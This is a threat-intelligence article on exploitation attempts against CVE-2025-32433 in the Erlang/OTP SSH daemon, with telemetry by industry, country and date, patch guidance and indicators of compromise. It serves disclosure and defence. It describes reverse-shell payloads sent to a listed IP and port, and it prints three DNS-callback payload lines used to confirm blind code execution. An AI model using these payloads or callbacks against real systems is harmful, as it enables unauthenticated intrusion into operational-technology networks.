Erlang/OTP SSH Vulnerability Analysis and Exploits Observed in the Wild

Written by

admin

in

Executive Summary

This article presents our observations of exploit attempts targeting CVE-2025-32433. This vulnerability allows unauthenticated remote code execution (RCE) in the Secure Shell (SSH) daemon (sshd) from certain versions of the Erlang programming language’s Open Telecom Platform (OTP).

Erlang/OTP sshd is widely used in critical infrastructure and operational technology (OT) networks.With a CVSS score of 10.0, CVE-2025-32433 enables unauthenticated clients to execute commands by sending SSH connection protocol messages (codes >= 80) to open SSH ports, which should only be processed after successful authentication. Vulnerable versions include Erlang/OTP prior to OTP-27.3.3, OTP-26.2.5.11 and OTP-25.3.2.20.

A patch is available in Erlang/OTP versions OTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20 and later.

We have reproduced, validated and analyzed this vulnerability to better understand its impact and provide detection strategies. We observed a significant increase in exploitation activity targeting this vulnerability from May 1-9, 2025, with 70% of our detections originating from firewalls protecting global operational technology (OT) networks.

This analysis includes telemetry data showing geographic distribution and trends as well as the industries affected by this vulnerability.

Palo Alto Networks customers are better protected from the threats discussed in this article through the following products and services:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Vulnerabilities Discussed CVE-2025-32433

Details of the Vulnerability

Erlang is a programming language designed for building concurrent systems where multiple connections are needed simultaneously. Its companion framework, the Open Telecom Platform (OTP), has long been trusted in critical infrastructure from telecommunications networks to financial systems.

OT and 5G environments use Erlang/OTP due to its fault-tolerance and scalability for high availability systems with minimal downtime. Due to compliance and safety requirements, OT and 5G administrators tend to use Erlang/OTP’s native SSH implementation to remotely manage hosts, which makes CVE-2025-32433 a particular concern in these types of networks.

At the heart of Erlang/OTP’s secure communication capabilities lies its native SSH implementation — responsible for encrypted connections, file transfers and most importantly, command execution. A flaw in this implementation would allow an attacker with network access to execute arbitrary code on vulnerable systems without requiring credentials, presenting a direct and severe risk to exposed assets.

Analyzing global internet scanning data from Cortex Xpanse in April 2025, we saw vulnerable Erlang/OTP SSH services were widely exposed on the internet using different TCP ports. This included TCP port 2222, which is commonly used for communications with older industrial automation components and sometimes used by the Ethernet/IP implicit messaging protocol.

CVE-2025-32433 is inferred from SSH versions tied to Erlang/OTP releases. This widespread exposure on industrial-specific ports indicates a significant global attack surface across OT networks. Analysis of affected industries demonstrates variance in the attacks.

In our telemetry, we saw that the following industries were disproportionately affected, with over 85% of exploit attempts being triggered directly on their OT firewalls:

  • Healthcare
  • Agriculture
  • Media and entertainment
  • High technology

Despite high OT reliance, utilities and energy, mining, and aerospace and defense showed no direct OT triggers for this specific threat.

Sectors like professional and legal services primarily saw triggers on their IT networks. Industries such as manufacturing, wholesale and retail, and financial services experienced more balanced detection across both IT and OT, necessitating integrated defenses.

Scope of Exploitation Attempts Targeting CVE-2025-32433

Our telemetry confirms active exploitation attempts of CVE-2025-32433. Our sensors have detected exploit attempts targeting this vulnerability across multiple industries, with the earliest observation occurring on May 1, 2025.

We identified several malicious payloads being delivered through CVE-2025-32433 exploit attempts. A commonly observed technique uses reverse shells to gain unauthorized remote access. Two examples seen in the wild include the following payloads.

Payload 1

File descriptors are used to create a TCP connection and bind it to a shell, allowing interactive command execution over the network, as shown in Figure 1.

Figure 1. TCP connection creation.

Payload 2

Figure 2 shows a simpler variant that initiates a reverse shell using Bash’s interactive mode and redirects the shell’s input and output directly to a remote host at 146.103.40[.]203:6667. This port is commonly associated with remote control servers used for botnet communications.

Screenshot of a TCP steam with network address and port details visible.
Figure 2. Remote host redirect.

Threat Infrastructure Insights

Our investigation into DNS telemetry was driven by DNS-based indicators we discovered during our payload analysis of exploitation attempts targeting CVE-2025-32433. Several payloads contained commands attempting DNS lookups of long, randomly generated subdomains under dns.outbound.watchtowr[.]com:

  • execSinet:gethostbyname(“d0am3pi3pgl6h3t9mkp0qt3zn9p1izwso.dns.outbound.watchtowr[.]com”).Zsession
  • execSinet:gethostbyname(“d0a3qn23pglekp6ckgtge8xxfd14a8ouk.dns.outbound.watchtowr[.]com”).Zsession
  • execSinet:gethostbyname(“d09idt23pgl3db0en3dgeam6i45tpc6bg.dns.outbound.watchtowr[.]com”).Zsession

These payloads also provide clear signs of Out-of-Band Application Security Testing (OAST). Specifically, DNS lookups to randomized subdomains under dns.outbound.watchtowr[.]com were triggered using gethostbyname() calls — a common tactic in blind RCE or exfiltration testing.

These payloads are designed not to return results directly, but to validate execution via external DNS resolutions that the attacker monitors. This approach is widely used in stealthy campaigns, red team assessments and automated scanning frameworks.

Scope of the Activity

We conducted a multi-source analysis to understand how attackers attempt exploitation of CVE-2025-32433 in real-world environments. This analysis highlights the geographic distribution of vulnerable systems, exploit activity across key industry sectors and evolving trends over time.

Exposure Surface Analysis

Cortex Xpanse revealed 275 distinct hosts and 326 distinct Erlang/OTP services that were publicly routable on the internet between April 16 and May 9, 2025. The countries observed to host the most Erlang/OTP servers are the U.S., Brazil and France.

Cortex Xpanse scans showed that Erlang/OTP services are widely exposed and vulnerable on industrial networks. Figure 3 below shows the services found on TCP ports like 830, 2022 and 22.

Bar chart showing the distribution of observed Erlang/OTP server ports and their exposure status labeled as 'Vulnerable' or 'Not Vulnerable' in Cortex XPANSE. The columns included on the right detail the port numbers, SSH version, if they are vulnerable, and the number of hosts.
Figure 3. Port and vulnerability exposure of Erlang/OTP services.

The group of exposed ports includes TCP port 2222. This port is also sometimes used by Ethernet/IP implicit messaging, highlighting a direct bridge between IT-centric software vulnerabilities and the operational heart of industrial control systems.

This overlap highlights the following:

  • Attack surface convergence
    The blurred boundary between IT and OT systems, where a software vulnerability in an IT-facing protocol such as Erlang/OTP, could share network space — or even ports — with industrial control system traffic.
  • Increased exploitability
    Attackers scanning for exploitable Erlang/OTP services could inadvertently or intentionally interact with exposed industrial control systems (ICS) devices, creating opportunities for pivoting into OT environments, especially where network segmentation is weak.

Geographic Distribution of Exploit Attempts

After the vulnerability was published on April 16, 2025, we began to detect exploit attempts from a few countries, as shown below in Figures 4 and 5. Figure 4 represents the total number of CVE-2025-32433 signatures triggered by all firewalls in a given country. Figure 5 represents signature triggers specifically from firewalls identified as being within OT networks.

Heat map showing various countries colored in shades of teal to red, representing data with a scale from 1 to 2,693. Low instances are teal and high instances are red. The United States is entirely red. The only country with slight variation is Japan.
Figure 4. All network victim geolocation.
Heat map highlighting countries in varying shades of blue and red, indicating different data values ranging from 1 to 1,916. The Unite States is entirely red.
Figure 5. OT network victim geolocation.

Out of a total of 3,376 CVE-2025-32433 signatures triggered globally, 2,363 (approximately 70%) originated from firewalls protecting OT networks. While the figures might appear the same, South America and Scandinavia showed minimal or no OT-related exploit activity despite broader exploitation elsewhere — indicating either better segmentation, slower adoption of vulnerable stacks or detection gaps.

Countries With High OT Correlation:

  • Japan: 99.74% of its CVE-2025-32433 signatures originated from OT networks
  • U.S.: Despite a lower percentage (71.15%) compared to Japan, the volume of signatures in the U.S. (1916 within OT) signifies a great number of potential incidents affecting American industrial systems
  • The Netherlands, Ireland, Brazil and Ecuador: For these countries, 100% of observed CVE-2025-32433 signature triggers occurred within OT environments
  • France: This country had a significant OT impact at 66.67% of observed signature triggers

The disproportionate volume of CVE-2025-32433 exploit attempts observed in OT networks across countries like Japan, the U.S. and others reflects a combination of factors, not a singular cause.

These regions often host highly connected, digitally mature industrial sectors that rely on complex IT/OT integrations where general-purpose components like Erlang/OTP could be embedded in operational environments.

Exploit Distribution by Industry

Almost 70% of the total number of signature triggers originated from firewalls protecting OT networks. Of the total number of firewalls that saw an exploit attempt, nearly 60% of the attempts were on firewalls within OT networks. Averaging out the number of exploit attempts per firewall, OT networks saw 160% more attempts per device than non-OT networks.

This indicates:

  • A significant number of OT firewalls are exposed to the internet
  • Adversaries might have already breached edge security, compromised enterprise devices and established persistence
    • They could be launching this exploit attempt from within enterprise networks using lateral movement techniques, with the goal of accessing OT networks
  • Discrepancy in exploit attempts on OT networks could indicate the intention of malicious actors to infiltrate critical infrastructure

This number could be anomalous because of the small sample size analyzed.

An outsized majority of triggers originated in the education industry, both within all networks and OT networks, with 2,460 (72.7% of total) and 2,090 (88.4% of total) respectively, shown in Figure 6 below.

Bar chart comparing the number of incidents in two categories, "All Industries" and "OT Industries", split into "Education" and "Remaining". "Education" incidents are significantly higher in "All Industries" compared to "OT Industries".
Figure 6. CVE triggers by industry.

The industry-level distribution of CVE-2025-32433 exploitation attempts underscores a critical shift in the operational threat landscape.

We observed nearly 70% of exploit attempts within OT networks. Several sectors — including healthcare, high technology and education — showed a disproportionately high concentration of OT-specific activity.

This challenges the traditional view that OT risk is confined to industrial control systems or manufacturing. At the same time, we should not interpret the absence of detections in the following OT-heavy sectors as safety:

  • Utilities and energy
  • Mining and aerospace
  • Defense

We should instead see it as potential evidence of detection weakness or delayed targeting.

These findings highlight that attackers are exploiting the realities of IT/OT convergence and are targeting operational systems wherever they exist.

Temporal Trends in Exploitation

Bar chart showing daily data from May 1st to May 9th 2025 with two categories: "Total" and "OT Only." The bars for "Total" are consistently higher than those for "OT Only." Color distinctions indicate different categories with blue for Total and red for OT Only.
Figure 7. Trigger distribution by day.

Analyzing the data we have for May 2025, peaks in total triggers often correlate with OT activity. Figure 7 shows the days with the highest total triggers (May 3, May 6, May 8, May 9) include the days with significant OT activity (May 3, May 8, May 9).

Exploitation attempts of CVE-2025-32433 are not uniform or continuous — they appear in concentrated bursts that disproportionately impact OT environments. When activity spikes, it is frequently driven by OT-specific triggers, often accounting for over 80% of detections on peak days.

The geographic, industrial and temporal footprint of CVE-2025-32433 exploit attempts highlights a strategic shift in attacker behavior toward operational environments across diverse sectors and regions. Exploits are not limited to traditionally defined industrial control systems. They appear in healthcare, education, high tech and other verticals — many of which host embedded OT systems not previously treated as high risk.

Geographically, countries with mature digital infrastructure and strong industrial bases — such as Japan, the U.S. and Brazil — show high OT exposure, while sectors like utilities and mining show no detections despite high inherent risk. This suggests telemetry gaps, delayed targeting or underreporting. Combined, these patterns illustrate that modern OT threats do not follow legacy assumptions about where OT resides or how it is attacked.

We have confirmed active exploitation attempts through payload telemetry, with disproportionate impact on OT networks across multiple industries. The use of stealthy reverse shells and DNS-based callbacks further indicates that attackers are employing evasive techniques.

Mitigation Guidance

The rapid surge in attack payloads suggests that threat actors have quickly adopted this exploit in active campaigns. This pattern underscores the urgency for organizations — particularly those in the targeted sectors and geographies outlined above — to improve protections.

  • Apply the latest security patches
  • Update intrusion prevention systems with the newest signatures
  • Closely monitor environments for signs of compromise

The primary mitigation for this vulnerability is to upgrade Erlang/OTP to a patched version:

  • OTP 27.3.3 or later
  • OTP 26.2.5.11 or later
  • OTP 25.3.2.20 or later

As a temporary workaround (if patching is not immediately possible), consider disabling the SSH server or using firewall rules to restrict access to trusted sources only (as suggested by NIST).

Conclusion

CVE-2025-32433 is a serious vulnerability resulting from improper state enforcement in the Erlang/OTP SSH daemon, which could potentially allow unauthenticated RCE. The failure to reject post-authentication messages before authentication completion creates a significant attack surface that is being exploited in the wild.

Attackers are attempting to exploit the vulnerability in short, high-intensity bursts. These are disproportionately targeting OT networks and attempting to access exposed services over both IT and industrial ports. Early telemetry confirms that the threat extends far beyond traditional industrial sectors, impacting education, healthcare and high technology — underscoring the reality that critical OT assets now exist across a much broader digital surface area.

Organizations must re-examine their exposure, enhance OT-specific visibility and treat CVE-2025-32433 not as an isolated issue, but as a case study in how general-purpose software flaws can rapidly escalate into operational threats.

Palo Alto Networks Product Protections for CVE-2025-32433

Palo Alto Networks customers are better protected from these threats by the products and services listed below.

Cortex XDR and XSIAM are designed to prevent the execution of known malicious malware, and also prevent the execution of unknown malware using Behavioral Threat Protection.

Cortex Xpanse has the ability to identify exposed devices on the public internet and escalate these findings to defenders. Customers can enable alerting on this risk by ensuring that the Attack Surface Rule is enabled. Identified findings can either be viewed in the Threat Response Center or in the incident view of Expander. These findings are also available for Cortex XSIAM customers who have purchased the ASM module.

Next-Generation Firewall with the Advanced Threat Prevention subscription can help block activity associated with CVE-2025-32433 (Erlang OTP SSH Remote Code Execution Vulnerability) with the release of our threat prevention signature 96163.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared our findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

  • .dns.outbound.watchtowr[.]com
  • 194.165.16[.]71
  • 146.103.40[.]203

Additional References

Continue Reading

More posts